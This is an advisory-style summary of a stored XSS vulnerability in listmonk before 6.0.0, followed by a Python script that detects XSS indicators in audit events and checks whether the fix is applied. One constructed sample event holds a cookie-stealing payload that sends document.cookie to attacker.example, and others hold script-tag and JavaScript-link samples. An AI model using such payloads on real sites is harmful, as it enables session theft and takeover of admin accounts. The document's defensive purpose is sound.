CVE-2026-21483
📋 TL;DR
This is a stored cross-site scripting (XSS) vulnerability in listmonk that allows lower-privileged users to inject malicious JavaScript into campaigns or templates. When higher-privileged users view this content, the XSS executes in their browser context, potentially allowing attackers to perform privileged actions like creating backdoor admin accounts. All listmonk instances running versions before 6.0.0 are affected.
💻 Affected Systems
- listmonk
📦 What is this software?
listmonk is a self-hosted newsletter and mailing list manager written in Go (github.com/knadh/listmonk). Campaign and template content authored by one user is rendered for other users in the admin UI and, when enabled, on the public campaign archive; that rendering path is where this vulnerability lives.
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of the listmonk instance with attacker gaining super admin privileges, creating backdoor accounts, stealing sensitive data, and potentially pivoting to other systems.
Likely Case
Privilege escalation where attackers gain administrative access to the listmonk platform, allowing them to manipulate mailing lists, send malicious campaigns, or access subscriber data.
If Mitigated
Reduced impact if non-admin users cannot edit campaigns or templates and the public archive is disabled. A Content Security Policy limits what injected script can do but does not remove the underlying flaw, so the instance remains at risk until it is patched.
🎯 Exploit Status
Exploitation requires an authenticated account with campaign or template management permissions; the attacker plants the payload and then waits for a higher-privileged user to render it. The advisory confirms the issue is weaponizable through the public archive feature, where the victim only needs to visit a link to a malicious archived campaign.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 6.0.0
Vendor Advisory: https://github.com/knadh/listmonk/security/advisories/GHSA-jmr4-p576-v565
Restart Required: Yes
Instructions:
1. Back up your listmonk database and configuration.
2. Stop the listmonk service.
3. Update to version 6.0.0 or later using your deployment method (Docker, binary, source).
4. Restart the listmonk service.
5. Verify the update was successful.
🔧 Temporary Workarounds
Restrict User Permissions
Temporarily remove campaign and template management permissions from all non-essential users until patching can be completed.
Disable Public Archive Feature
If not required, disable the public archive feature so that a planted payload cannot be delivered to victims via a link to an archived campaign.
🧯 If You Can't Patch
- Implement strict Content Security Policy (CSP) headers to mitigate XSS impact
- Enable audit logging for all user actions and monitor for suspicious campaign/template modifications
🔍 How to Verify
Check if Vulnerable:
Check your listmonk version. If it's below 6.0.0, you are vulnerable.
Check Version:
Check the listmonk web interface admin panel or run: ./listmonk --version (if using binary)
Verify Fix Applied:
After updating, verify the version reports 6.0.0 or higher, then confirm the fix behaviourally: as a non-admin user with campaign permissions, save a campaign containing a harmless marker such as a script tag, and check that it is escaped or stripped wherever admins view it and on the public archive page if that feature is enabled.
📡 Detection & Monitoring
Log Indicators:
- Unusual campaign or template modifications by lower-privileged users
- JavaScript or script tags in campaign content
- Multiple admin account creation events
Network Indicators:
- Unusual outbound connections from listmonk server
- Suspicious HTTP requests containing script payloads
SIEM Query:
source="listmonk" AND (event="campaign_update" OR event="template_update") AND user_role!="admin" AND (content CONTAINS "<script>" OR content CONTAINS "javascript:")
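The SIEM query above only matches the literal strings "<script>" and "javascript:", which a mixed-case tag or an event-handler attribute bypasses. The following is an added example (not code from the page or from the listmonk project) that applies a broader indicator set to constructed audit events, and also implements the canary check described under "Verify Fix Applied" by classifying how a marker payload comes back in a rendered page. The event field names (event, user_role, content) are assumed for illustration and are not listmonk's real audit schema; the sample events are constructed.

```python
import html
import re

# Indicator patterns. Deliberately broader than the page's SIEM query:
# case-insensitive, tolerant of whitespace, and covering event-handler
# attributes and embedded-document tags, not just <script> and javascript:.
XSS_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.IGNORECASE),
    "javascript_uri": re.compile(r"javascript\s*:", re.IGNORECASE),
    # Matches on<name>= attributes (onerror=, onload=, ...). Expect some
    # false positives on words ending in "on" followed by "="; tune as needed.
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE),
    "embedded_document": re.compile(r"<\s*(svg|iframe|object|embed)\b", re.IGNORECASE),
    "data_uri_html": re.compile(r"data\s*:\s*text/html", re.IGNORECASE),
}


def find_xss_indicators(content: str) -> list[str]:
    """Return the names of all indicator patterns found in a content blob."""
    return [name for name, rx in XSS_PATTERNS.items() if rx.search(content)]


# Constructed sample events (hypothetical schema, not listmonk's audit log).
SAMPLE_EVENTS = [
    {"event": "campaign_update", "user": "editor1", "user_role": "campaign_manager",
     "content": "<p>Hello subscriber</p>"},
    {"event": "template_update", "user": "editor2", "user_role": "campaign_manager",
     "content": "<img src=x onerror=fetch('https://attacker.example/'+document.cookie)>"},
    {"event": "campaign_update", "user": "editor1", "user_role": "campaign_manager",
     "content": '<a href="JavaScript:alert(1)">click</a>'},
    {"event": "campaign_update", "user": "admin", "user_role": "admin",
     "content": "<ScRiPt>alert(1)</ScRiPt>"},
    {"event": "login", "user": "editor2", "user_role": "campaign_manager", "content": ""},
]

CONTENT_EVENTS = ("campaign_update", "template_update")


def flag_suspicious_events(events: list[dict]) -> list[dict]:
    """Mirror the page's query: content edits by non-admins carrying script indicators."""
    flagged = []
    for ev in events:
        if ev.get("event") not in CONTENT_EVENTS:
            continue
        if ev.get("user_role") == "admin":
            continue
        hits = find_xss_indicators(ev.get("content", ""))
        if hits:
            flagged.append({**ev, "indicators": hits})
    return flagged


# Harmless marker to save in a campaign when verifying the fix.
CANARY = "<script>window.__xss_canary=1</script>"


def canary_state(rendered_html: str, canary: str = CANARY) -> str:
    """Classify how the canary came back from a rendered page.

    "raw"     - appears verbatim: the page is still vulnerable
    "escaped" - appears HTML-entity-encoded: sanitization is working
    "absent"  - stripped entirely (or the wrong page was fetched)
    """
    if canary in rendered_html:
        return "raw"
    if html.escape(canary, quote=False) in rendered_html:
        return "escaped"
    return "absent"


if __name__ == "__main__":
    for ev in flag_suspicious_events(SAMPLE_EVENTS):
        print(ev["user"], ev["event"], ev["indicators"])
    print(canary_state("<p>&lt;script&gt;window.__xss_canary=1&lt;/script&gt;</p>"))
```

Run against the sample events this flags editor2's onerror payload and editor1's JavaScript: link, neither of which the original query would catch, while the admin's own script tag is excluded as the page's query intends. Note that excluding admin events also hides the case where an admin account has already been taken over; for that, drop the role filter and alert on the indicators alone. For the canary check, fetch the admin campaign preview and the public archive page with an ordinary HTTP client and pass the body to canary_state; "escaped" or "absent" is the expected result on 6.0.0 or later.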